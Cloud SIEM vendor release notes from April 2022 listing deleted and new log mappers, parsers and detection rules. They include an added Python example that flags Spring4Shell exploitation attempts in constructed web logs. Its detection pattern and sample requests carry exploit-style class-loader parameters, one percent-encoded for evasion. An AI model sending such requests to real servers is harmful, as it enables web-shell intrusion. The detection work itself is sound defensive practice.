  • [Deleted] BLUECOAT_PROXY
  • [Deleted] BLUECOAT_PROXY_2
  • [Deleted] BLUECOAT_PROXY_4
  • [Deleted] BLUECOAT_PROXY_5
  • [Deleted] BLUECOAT_PROXY_6
  • [Deleted] BLUECOAT_PROXY_7
  • [Deleted] Bind_DNS_log_1
  • [Deleted] Bind_DNS_log_10
  • [Deleted] Bind_DNS_log_2
  • [Deleted] Bind_DNS_log_3
  • [Deleted] Bind_DNS_log_4
  • [Deleted] Bind_DNS_log_5
  • [Deleted] Bind_DNS_log_6
  • [Deleted] Bind_DNS_log_7
  • [Deleted] Bind_DNS_log_8
  • [Deleted] Bind_DNS_log_9
  • [Deleted] CB_PROTECT
  • [Deleted] CB_PROTECT_USERNAME
  • [Deleted] CB_RESPONSE_SERVER_1
  • [Deleted] CB_RESPONSE_SERVER_10
  • [Deleted] CB_RESPONSE_SERVER_11
  • [Deleted] CB_RESPONSE_SERVER_13
  • [Deleted] CB_RESPONSE_SERVER_14
  • [Deleted] CB_RESPONSE_SERVER_15
  • [Deleted] CB_RESPONSE_SERVER_17
  • [Deleted] CB_RESPONSE_SERVER_2
  • [Deleted] CB_RESPONSE_SERVER_20
  • [Deleted] CB_RESPONSE_SERVER_3
  • [Deleted] CB_RESPONSE_SERVER_4
  • [Deleted] CB_RESPONSE_SERVER_5
  • [Deleted] CB_RESPONSE_SERVER_6
  • [Deleted] CB_RESPONSE_SERVER_7
  • [Deleted] CB_RESPONSE_SERVER_9
  • [Deleted] CB_RESPONSE_SEVERITY_1
  • [Deleted] CB_RESPONSE_SEVERITY_2
  • [Deleted] CB_RESPONSE_SEVERITY_3
  • [Deleted] CHECKPOINT_ACCEPT
  • [Deleted] CHECKPOINT_CRYPT
  • [Deleted] CHECKPOINT_DROP
  • [Deleted] CHECKPOINT_KEY_INSTALL
  • [Deleted] CHECKPOINT_VPN_ROUTE
  • [Deleted] CICSCOFW434002
  • [Deleted] CISCOFW321001
  • [Deleted] CISCOFW419001
  • [Deleted] CISCO_ACS_FAILED_ATTEMPT
  • [Deleted] CISCO_ACS_FAILED_AUTHENTICATION
  • [Deleted] CISCO_ACS_PASSED_AUTHENTICATION
  • [Deleted] CISCO_ACS_TACACS_ACCOUNTING
  • [Deleted] CISCO_MERAKI_IDS_ALERTS
  • [Deleted] CISCO_MERAKI_SECURITY_EVENT
  • [Deleted] CISCO_MERAKI_SECURITY_EVENT_SECURITY_FILTERING_DISPOSITION_CHANGE
  • [Deleted] CRM_VODLOG
  • [Deleted] Cisco_Umbrella_IP_Logs
  • [Deleted] Dns_Update
  • [Deleted] EPO_THREATS_AV
  • [Deleted] EPO_THREAT_EVENT
  • [Deleted] EXABEAM
  • [Deleted] F5_HTTPD_AUDIT
  • [Deleted] F5_SSHD_SAMPLES
  • [Deleted] F5_SSL_REQUEST
  • [Deleted] FLOW_REASSEMBLE
  • [Deleted] FORCEPOINT_NEW_AND_IMPROVED
  • [Deleted] Failed_Logon
  • [Deleted] Firepower_ALERT_IDS
  • [Deleted] Firepower_Access_Control
  • [Deleted] Firepower_Access_Control_2
  • [Deleted] Firepower_Access_Control_3
  • [Deleted] Firepower_Access_Control_4
  • [Deleted] Firepower_Access_Control_5
  • [Deleted] IBM_WebSpheredatadevice_error_1
  • [Deleted] IBM_WebSpheredatadevice_error_2
  • [Deleted] IBM_WebSpheredatadevice_error_3
  • [Deleted] IBM_WebSpheredatadevice_error_4
  • [Deleted] IBM_WebSpheredatadevice_error_5
  • [Deleted] INFLOBLOX_DNS_MESSAGE
  • [Deleted] INFOBLOX_DHCPACK_RENEW_SAMPLES
  • [Deleted] INFOBLOX_DHCPDISCOVER_SAMPLES
  • [Deleted] INFOBLOX_DHCPDISCOVER_SAMPLES_2
  • [Deleted] INFOBLOX_DHCPDISCOVER_UNKNOWN_NETWORK_SAMPLE
  • [Deleted] INFOBLOX_DHCPEXPIRE_SAMPLES
  • [Deleted] INFOBLOX_DHCPNAK_SAMPLES
  • [Deleted] INFOBLOX_DHCPOFFER_UID_SAMPLES
  • [Deleted] INFOBLOX_DHCPRELEASE_SAMPLES
  • [Deleted] INFOBLOX_DHCP_UPDATER_1
  • [Deleted] INFOBLOX_DHCP_UPDATER_2
  • [Deleted] INFOBLOX_DHCP_UPDATER_3
  • [Deleted] INFOBLOX_DHCP_UPDATER_4
  • [Deleted] INFOBLOX_DHCP_UPDATER_5
  • [Deleted] INFOBLOX_DHCP_V2_SAMPLES
  • [Deleted] INFOBLOX_DNS_QUERIES
  • [Deleted] INFOBLOX_DNS_REQUEST_AXFR_ENDED
  • [Deleted] INFOBLOX_DNS_REQUEST_AXFR_STARTED
  • [Deleted] INFOBLOX_DNS_RESPONSE
  • [Deleted] INFOBLOX_DNS_ZONE_UPDATE_1
  • [Deleted] INFOBLOX_DNS_ZONE_UPDATE_2
  • [Deleted] INFOBLOX_DNS_ZONE_UPDATE_3
  • [Deleted] INFOBLOX_DNS_ZONE_UPDATE_4
  • [Deleted] INFOBLOX_DNS_ZONE_UPDATE_5
  • [Deleted] INFOBLOX_DNS_ZONE_UPDATE_6
  • [Deleted] INFOBLOX_DOMAIN_NOTIFIED
  • [Deleted] IRONPORT_QUARANTINE_MID
  • [Deleted] IRONPORT_QUARANTINE_TO
  • [Deleted] IRON_PORT_CONNECTION
  • [Deleted] IRON_PORT_DCID_MSG
  • [Deleted] IRON_PORT_DKIM
  • [Deleted] IRON_PORT_ICID_MSG
  • [Deleted] IRON_PORT_INFO_ICID
  • [Deleted] IRON_PORT_INFO_MID
  • [Deleted] IRON_PORT_INFO_MID_ICID
  • [Deleted] IRON_PORT_INFO_MSG
  • [Deleted] IRON_PORT_ISQ_RPC
  • [Deleted] IRON_PORT_WARN_FULL
  • [Deleted] IRON_PORT_WARN_INVALID_DNS_FULL
  • [Deleted] IRON_PORT_WARN_LIMIT
  • [Deleted] IRON_PORT_WARN_MSG
  • [Deleted] IRON_PORT_WSA
  • [Deleted] IRON_PORT_WSA_NOHD
  • [Deleted] IRON_PORT_WSA_NOHD_01
  • [Deleted] IRON_PORT_WSA_NOHD_03
  • [Deleted] IRON_PORT_WSA_SFIMS_PROTOCOL_1
  • [Deleted] IRON_PORT_WSA_SFIMS_PROTOCOL_2
  • [Deleted] IRON_PORT_WSA_SFIMS_PROTOCOL_3
  • [Deleted] IRON_PORT_WSA_SFIMS_PROTOCOL_4
  • [Deleted] Internal_Auth_Logs
  • [Deleted] LINUXSERVER_AUDIT_LOGS_1
  • [Deleted] LINUXSERVER_AUDIT_LOGS_2
  • [Deleted] LINUXSERVER_LOG_1
  • [Deleted] LINUXSERVER_LOG_11
  • [Deleted] LINUXSERVER_LOG_2
  • [Deleted] LINUXSERVER_LOG_3
  • [Deleted] LINUXSERVER_LOG_4
  • [Deleted] LINUXSERVER_LOG_5
  • [Deleted] LINUXSERVER_LOG_6
  • [Deleted] LINUXSERVER_LOG_7
  • [Deleted] LINUX_USER_AND_HOSTNAME
  • [Deleted] Linux_Laravel_Logs1
  • [Deleted] Linux_Laravel_Logs2
  • [Deleted] Linux_Laravel_Logs3
  • [Deleted] MVISION_CASB
  • [Deleted] NAT_RULES_MATCH
  • [Deleted] NMS_LOGS
  • [Deleted] NSM_THREAT_IPS
  • [Deleted] OAUTH_LOG
  • [Deleted] Ossec_Logs_01
  • [Deleted] Ossec_Logs_02
  • [Deleted] Ossec_Logs_03
  • [Deleted] Ossec_Logs_04
  • [Deleted] Ossec_Logs_06
  • [Deleted] PALO_ALTO_TRAPS
  • [Deleted] PALO_TRAPS_EXTRA
  • [Deleted] PAN_TRAPS_ANALYTICS
  • [Deleted] PAN_TRAPS_ANALYTICS_CLOUD
  • [Deleted] PAN_TRAPS_CONFIG_CLOUD
  • [Deleted] PAN_TRAPS_MISC_CLOUD
  • [Deleted] PAN_TRAPS_SYSTEM_CLOUD
  • [Deleted] PULSESECURE_LOGS
  • [Deleted] PULSESECURE_LOGS2
  • [Deleted] Renew_Logs
  • [Deleted] SESSION_ERROR
  • [Deleted] SHIBBOLETH_DUO
  • [Deleted] SHIBBOLETH_HTTP_EDU
  • [Deleted] SHIBBOLETH_HTTP_MAIL
  • [Deleted] SHIBBOLETH_LDAP
  • [Deleted] SHIBBOLETH_LDAP_EMAIL
  • [Deleted] SNARE_AGENTHEARTBEAT_LOGS
  • [Deleted] SNARE_WINDOWS_DHCP_LOGS
  • [Deleted] SNMP_LOGS
  • [Deleted] SURICATA_HTTP_LOGS
  • [Deleted] SURICATA_LOGSTASH
  • [Deleted] SURICATA_LOGSTASH_CUSTOM
  • [Deleted] SURICATA_THREAT_LOGS
  • [Deleted] SYMANTEC_SEP_Anti_Virus
  • [Deleted] SYMANTEC_SEP_PRF_01
  • [Deleted] SYMANTEC_SEP_PRF_02
  • [Deleted] SYMANTEC_SEP_PRF_03
  • [Deleted] SYMANTEC_SEP_SDN
  • [Deleted] SYMANTEC_SEP_SONAR
  • [Deleted] SYMANTEC_SEP_SRF
  • [Deleted] SYMANTEC_SEP_USB_1
  • [Deleted] SonicWall_Bad_FTP_Protocol
  • [Deleted] SonicWall_Block_Dropped_Events
  • [Deleted] SonicWall_Flood_Attack
  • [Deleted] SonicWall_IPS
  • [Deleted] SonicWall_Port_Scan
  • [Deleted] SonicWall_URL_Filter
  • [Deleted] Successful_Logon
  • [Deleted] TANIUM_S24_TYPE_LOGS
  • [Deleted] VAR_LOG_SECURE_SUCCESSFUL_LOGIN
  • [Deleted] VDM_LOG_EXTRA
  • [Deleted] VDM_MESSAGES_CONNECT
  • [Deleted] VDM_MESSAGES_DIRECTORY
  • [Deleted] VDM_MESSAGES_FROM
  • [Deleted] VDM_MESSAGES_FTP
  • [Deleted] VDM_MESSAGES_WARN
  • [Deleted] VLT_VAULT_EXTRA
  • [Deleted] VPN_Message_2
  • [Deleted] VPN_Message_3
  • [Deleted] VPN_Message_4
  • [Deleted] VPN_Message_5
  • [Deleted] VPN_Messages
  • [Deleted] Vmware_Logs_1
  • [Deleted] Vmware_Logs_2
  • [Deleted] Vmware_Logs_3
  • [Deleted] Vmware_Logs_4
  • [Deleted] Vmware_Logs_5
  • [Deleted] Vmware_Logs_6
  • [Deleted] Vmware_Logs_7
  • [Deleted] Vmware_Logs_8
  • [Deleted] WATCHGUARD_FLOW_LOG
  • [Deleted] WATCHGUARD_FLOW_LOG_2
  • [Deleted] WINDOWS_DHCP_LOG
  • [Deleted] WINDOWS_QUICK_FIX
  • [Deleted] Zscaler_Firewall
  • [Deleted] cisco_authentication_01
  • [Deleted] cisco_authentication_02
  • [Deleted] cisco_authentication_03
  • [Deleted] cisco_authentication_04
  • [Deleted] cisco_authentication_05
  • [Deleted] cisco_authentication_06
  • [Deleted] cisco_authentication_07
  • [Deleted] cisco_authentication_08
  • [Deleted] cisco_authentication_09
  • [Deleted] cisco_authentication_10
  • [Deleted] cisco_authentication_11
  • [Deleted] cisco_authentication_12
  • [Deleted] cisco_authentication_13
  • [Deleted] cisco_authentication_14
  • [Deleted] cisco_authentication_15
  • [Deleted] cisco_ios_system_log_message
  • [Deleted] cisco_ios_system_log_message_queue_full
  • [Deleted] citrix_netscaler_AAA_Messsage
  • [Deleted] citrix_netscaler_API_CMD_EXECUTED
  • [Deleted] citrix_netscaler_TCP_connection_terminated
  • [Deleted] citrix_netscaler_delinked_message
  • [Deleted] citrix_netscaler_delinked_message_01
  • [Deleted] windows_defender

Schema

  • [New] _cipSourceHost
  • [New] _cipSourceName

April 7, 2022 - Announcement

On April 21, 2022, we will be removing the following legacy log mappers related to the CIP Windows collector from the Cloud SIEM platform. These log mappers are in use by only a small portion of our customer base, and we are working with our technical account teams to reach out directly to those impacted and migrate them to our newer Sumo parsers.

No loss of out-of-the-box functionality will occur and no out-of-the-box rules are impacted as the Sumo parsers map all of the same information. Please be sure to check any custom rules that leverage Windows logging for compatibility with the new parsing and mapping, particularly where the "fields" field is referenced.

  • Windows - Security - 1100 - CIP
  • Windows - Security - 1102 - CIP
  • Windows - Security - 4625 - CIP
  • Windows - Security - 4624 - CIP
  • Windows - Security - 4634 - CIP
  • Windows - Security - 4648 - CIP
  • Windows - Security - 4649 - CIP
  • Windows - Security - 4672 - CIP
  • Windows - Security - 4688 - CIP
  • Windows - Security - 4697 - CIP
  • Windows - Security - 4698 - CIP
  • Windows - Security - 4702 - CIP
  • Windows - Security - 4720 - CIP
  • Windows - Security - 4726 - CIP
  • Windows - Security - 4740 - CIP
  • Windows - Security - 4742 - CIP
  • Windows - Security - 5805 - CIP
  • Windows - Security - 4768 - CIP
  • Windows - Security - 4769 - CIP
  • Windows - Security - 4770 - CIP
  • Windows - Security - 4771 - CIP
  • Windows - Security - 4776 - CIP
  • Windows - Security - 4778 - CIP
  • Windows - Security - 4779 - CIP
  • Windows - Security - 5140 - CIP
  • Windows - Security - 4728 - CIP
  • Windows - Security - 4732 - CIP
  • Windows - Security - 4756 - CIP
  • Windows - Security - 4661 - CIP
  • Windows - Security - 4704 - CIP
  • Windows - Security - 4754 - CIP
  • Windows - Security - 4780 - CIP
  • Windows - Security - 4793 - CIP
  • Windows - Security - 5038 - CIP
  • Windows - Security - 6272 - CIP
  • Windows - Security - 6273 - CIP
  • Windows - Security - 6275 - CIP
  • Windows - Security - 6278 - CIP
  • Windows - Security - 4662 - CIP
  • Windows - Security - 4755 - CIP
  • Windows - Security - 4689 - CIP
  • Windows - Security - 4798 - CIP
  • Windows - Security - 6416 - CIP
  • Windows - Security - 6423 - CIP
  • Windows - Security - 6424 - CIP
  • Windows - Security - 4656 - CIP
  • Windows - Security - 4663 - CIP
  • Windows - Security - 4658 - CIP
  • Windows - Security - 4674 - CIP
  • Windows - Security - 4799 - CIP
  • Windows - Security - 5058 - CIP
  • Windows - Security - 5059 - CIP
  • Windows - Security - 5061 - CIP
  • Windows - Security - 5379 - CIP
  • Windows - System - 5138 - CIP
  • Windows - System - 6005 - CIP
  • Windows - System - 6006 - CIP
  • Windows - System - 7045 - CIP
  • Windows - Microsoft-Windows-PowerShell/Operational - 4103 - CIP
  • Windows - Microsoft-Windows-PowerShell/Operational - 4104 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 1 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 2 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 3 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 4 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 5 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 6 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 8 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 10 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 11 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 12, 13, and 14 - CIP
  • Windows - Microsoft-Windows-Sysmon/Operational - 15 - CIP

April 7, 2022 - Content Release

Rules

  • [Updated] MATCH-S00599 Alibaba ActionTrail Root Login
  • [Updated] MATCH-S00476 Suspicious Execution of Search Indexer
  • [Updated] MATCH-S00570 WMIPRVSE Spawning Process
  • [Updated] MATCH-S00168 Windows - Local System executing whoami.exe

Log Mappers

  • [New] Cisco ASA 313004 JSON
  • [New] Linux OS Syslog - Process kernel - Promiscuous Mode Change
  • [Updated] AzureActivityLog 01
  • [Updated] AzureActivityLog AuditLogs

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco ASA
  • [Updated] /Parsers/System/Linux/Linux OS Syslog
  • [Updated] /Parsers/System/Microsoft/Microsoft Azure JSON
  • [Updated] /Parsers/System/SentinelOne/SentinelOne Syslog

April 6, 2022 - Announcement

Upcoming Removal of Unused Content

On Tuesday, April 12th, **unused** legacy grok parsers and their corresponding log mappers will be removed from Cloud SIEM.

This update is part of a longer transition in which legacy grok parsers are being decommissioned in favor of the current parser set. Sumo Logic has confirmed that customers are **NOT** actively using any of the legacy grok parsers or log mappers scheduled for removal in this update.

Note that this content update does **NOT** remove or change legacy grok parsers or associated log mappers that customers still use today. We do not expect this update to cause any operational changes.


April 1, 2022 - Content Release

Spring4Shell Exploitation

A new Rule (MATCH-S00783) is being deployed to detect attempts to exploit Spring4Shell. A match on this Rule does not by itself indicate whether exploitation succeeded, but Cloud SIEM already includes a number of Rules that provide extensive coverage of common post-exploitation activity, notably:

  • MATCH-S00348 Curl Start Combination
  • MATCH-S00362 Suspicious Curl File Upload
  • LEGACY-S00044 HTTP Shell Script Download Disguised as a Common Web File
  • MATCH-S00149 PowerShell File Download
  • MATCH-S00164 Suspicious Shells Spawned by Web Servers
  • MATCH-S00174 Web Services Executing Common Web Shell Commands
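The following is an added example, not the logic of MATCH-S00783 or any other Sumo Logic content, showing what a URL-based "attempt" detection for Spring4Shell (CVE-2022-22965) looks like and why it cannot speak to success. The public exploit abuses Spring data binding to reach `class.module.classLoader.*` properties through request parameters, so the attempt is visible in the URL, while the outcome is not. The log format, sample lines, property prefixes, and function names below are assumptions constructed for the example; the lines are not real traffic.

```python
"""
Added example (not Sumo Logic's MATCH-S00783): flag Spring4Shell exploitation
*attempts* in constructed, CLF-style web access log lines by looking for request
parameters that reach the Java class loader through Spring's data binder.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Property-name prefixes the exploit must reference to reach the class loader.
# Matching on the prefix rather than the full Tomcat-specific chain also
# catches variants aimed at other containers. (Assumed list for this example.)
SUSPICIOUS_PROPS = (
    "class.module.classloader",  # Java 9+ path used by the public exploit
    "class.classloader",         # older variant (blocked by Spring since 2010)
)

# Constructed sample lines: client, timestamp, request line, status, bytes.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Apr/2022:10:01:02 +0000] "GET /app/greeting?name=bob HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Apr/2022:10:02:10 +0000] "POST /app/greeting?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di HTTP/1.1" 200 0',
    # Percent-encoded letters in the property name to evade naive substring matching.
    '198.51.100.7 - - [01/Apr/2022:10:02:11 +0000] "GET /app/greeting?%63lass.module.%63lassLoader.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1" 400 0',
    # Benign: "classloader" appears in a path, not as a bound parameter name.
    '10.0.0.9 - - [01/Apr/2022:10:03:00 +0000] "GET /static/classloader.js HTTP/1.1" 200 2048',
]

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def normalize(s: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoding cannot hide the property name."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s.lower()


def suspicious_params(target: str) -> list[str]:
    """Return normalized parameter names in the request URL that touch the class loader chain."""
    query = urlsplit(target).query
    hits = []
    for name, _value in parse_qsl(query, keep_blank_values=True):
        n = normalize(name)
        if any(n.startswith(prefix) for prefix in SUSPICIOUS_PROPS):
            hits.append(n)
    return hits


def detect(lines: list[str]) -> list[dict]:
    """Parse each line and emit one signal per request whose URL references the class loader chain."""
    signals = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a SIEM would route this to a catch-all mapper
        hits = suspicious_params(m["target"])
        if hits:
            signals.append({
                "src": m["src"],
                "method": m["method"],
                "status": int(m["status"]),
                "params": hits,
                # Attempt only: HTTP 200 does not prove the web shell landed,
                # and 400 does not prove it failed. Confirm via post-exploitation
                # telemetry (shells spawned by the web server, curl/PowerShell downloads).
                "attempt_only": True,
            })
    return signals


if __name__ == "__main__":
    for sig in detect(SAMPLE_LOGS):
        print(sig)
```

Two caveats follow from the design. Parameters carried in a POST body never reach the URL, so a URL-only detection misses that delivery path entirely; that gap is why the post-exploitation Rules listed above matter more than the attempt Rule for confirming compromise. And the decoding loop is bounded on purpose: unbounded re-decoding of attacker-controlled input is itself a way to burn detection CPU.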

Rules

  • [New] MATCH-S00783 Spring4Shell Exploitation - URL
  • [Updated] MATCH-S00555 Threat Intel - Inbound Traffic Context

Log Mappers

  • [New] Netskope - WebTx Events
  • [New] Tenable.io Authentication
  • [New] Tenable.io Catch All
  • [Updated] AWS CloudFront
  • [Updated] AWS WAF Block Logs
  • [Updated] Microsoft Office 365 Active Directory Authentication Events
  • [Updated] Tenable.io Vulnerability

Copyright © 2024 by Sumo Logic, Inc.